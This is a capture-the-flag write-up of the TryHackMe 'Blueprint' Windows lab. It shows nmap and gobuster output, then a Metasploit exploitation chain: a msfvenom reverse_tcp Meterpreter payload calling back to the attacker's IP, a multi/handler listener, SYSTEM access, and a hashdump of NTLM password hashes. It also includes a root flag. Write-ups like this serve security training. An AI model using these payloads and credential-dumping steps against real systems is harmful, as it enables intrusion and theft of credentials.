mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-25 13:20:18 +00:00
5.8 KiB
5.8 KiB
TryHackMe-Blueprint
Abdullah Rizwan | 23th September , 11:03 PM
NMAP
nmap -sC -sV $IP
Nmap scan report for 10.10.37.223
Host is up (0.38s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/7.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.42 seconds
Gobuster
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.37.223:8080
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/09/23 14:30:08 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/aux (Status: 403)
/cgi-bin/ (Status: 403)
/com2 (Status: 403)
/com3 (Status: 403)
/com1 (Status: 403)
/con (Status: 403)
/licenses (Status: 403)
/lpt1 (Status: 403)
/lpt2 (Status: 403)
/nul (Status: 403)
/phpmyadmin (Status: 403)
/prn (Status: 403)
/server-status (Status: 200)
/server-info (Status: 200)
/webalizer (Status: 403)
===============================================================
2020/09/23 14:32:46 Finished
PORT 8080
I looked up on exploitdb for osCommerce 2.4.3
and found many exploits one of which was
For me this exploit failed since I cannot make a new installation of database and RCE depends upon this step to be finished.
Metasploit
I looked on msfconsole if there was an exploit available
Then navigate to C:\Users\Administrator\Desktop
root flag : THM{aea1e3ce6fe7f89e10cea833ae009bee}
Now we cannot load kiwi
because it is not stabilized so we are going to create a payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.8.94.60 LPORT=7777 -f exe > shell.exe
Upload the payload on the machine
meterpreter > upload shell.exe
[*] uploading : shell.exe -> shell.exe
[*] Uploaded -1.00 B of 72.07 KiB (-0.0%): shell.exe -> shell.exe
[*] uploaded : shell.exe -> shell.exe
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-04-11 18:36:47 -0400 desktop.ini
100666/rw-rw-rw- 37 fil 2019-11-27 13:15:37 -0500 root.txt.txt
100777/rwxrwxrwx 73802 fil 2020-09-23 15:02:08 -0400 shell.exe
meterpreter >
Start another msfconsole
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set LHOST 10.8.94.60
LHOST => 10.8.94.60
msf5 exploit(multi/handler) > set LPORT 7777
LPORT => 7777
msf5 exploit(multi/handler) >
Meterpreter on unstabilized Shell
meterpreter > execute -f shell.exe
Process 5212 created.
meterpreter >
Meterperter for getting stablized shell
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.8.94.60:7777
[*] Sending stage (176195 bytes) to 10.10.143.248
[*] Meterpreter session 1 opened (10.8.94.60:7777 -> 10.10.143.248:49167) at 2020-09-23 15:13:54 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
meterpreter >
Visit Crackstation for cracking NTLM hash